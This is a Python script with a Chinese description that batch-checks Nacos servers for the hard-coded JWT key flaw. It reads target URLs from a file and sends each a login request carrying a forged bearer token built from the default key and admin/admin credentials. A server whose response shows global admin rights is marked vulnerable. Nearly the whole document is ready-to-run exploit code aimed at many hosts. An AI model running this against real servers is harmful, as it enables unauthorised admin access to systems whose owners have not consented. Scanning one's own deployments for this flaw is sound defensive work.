import requests
def check_vulnerability(url):
    """Return True when *url* answers the fixed-token login probe as an admin.

    One POST is sent to the Nacos login endpoint with a hard-coded bearer
    token in the Authorization header and the default ``admin``/``admin``
    form fields.  A 200 response whose body contains the substring
    ``globalAdmin":true`` is reported as affected.  A timeout or any other
    request error is printed and reported as ``False``.

    Note: ``verify=False`` disables TLS certificate validation for this
    request, and the ``Referer`` header is built from the raw ``url`` (no
    trailing-slash stripping), unlike the endpoint itself.
    """
    base = url.rstrip('/')
    login_endpoint = base + '/nacos/v1/auth/users/login'

    # Fixed request headers; the bearer token is a literal embedded in the script.
    probe_headers = {
        'User-Agent': 'ua',
        'Accept': 'application/json, text/plain, */*',
        'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
        'Accept-Encoding': 'gzip, deflate',
        'Content-Type': 'application/x-www-form-urlencoded',
        'Connection': 'close',
        'Referer': url + '/nacos/',
        'Authorization': 'Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6MTY4NzI4MDQ0MX0.rrdXzPvfY5tf_fAxkWwT6-GEkaRXXGhy1U2bdPceYKc',
    }
    form_fields = {
        'username': 'admin',
        'password': 'admin',
    }

    # Only the network call can raise a requests error; the verdict below cannot.
    try:
        resp = requests.post(
            login_endpoint,
            headers=probe_headers,
            data=form_fields,
            verify=False,  # certificate validation is intentionally off here
            timeout=5,
        )
    except requests.exceptions.Timeout:
        print(url + ' 请求超时,跳过此URL。')
        return False
    except requests.exceptions.RequestException as exc:
        print(url + ' 请求异常: ' + str(exc))
        return False

    # Substring match on the raw body; the body is only inspected on HTTP 200.
    admin_marker = 'globalAdmin":true'
    return resp.status_code == 200 and admin_marker in resp.text
def main():
    """Read one URL per line from ``urls.txt`` and print a verdict line for each.

    Each line is stripped of surrounding whitespace, passed to
    ``check_vulnerability``, and reported as ``漏洞存在:`` or ``漏洞不存在:``
    followed by the URL.  The file is closed before any request is made.
    """
    with open('urls.txt', 'r') as url_file:
        targets = [line.strip() for line in url_file]

    for target in targets:
        # The check runs first; the label depends on its boolean result.
        label = '漏洞存在:' if check_vulnerability(target) else '漏洞不存在:'
        print(label, target)
# Run the batch check only when the file is executed as a script, not on import.
if __name__ == "__main__":
    main()
nacos jwt 硬编码key 批量检测
该脚本使用Python的requests库进行HTTP请求,检查给定URL是否存在特定的安全漏洞。它尝试模拟登录Nacos系统API,验证管理员权限响应,如果存在漏洞则返回True,否则返回False。程序读取urls.txt文件中的URL列表进行批量检测。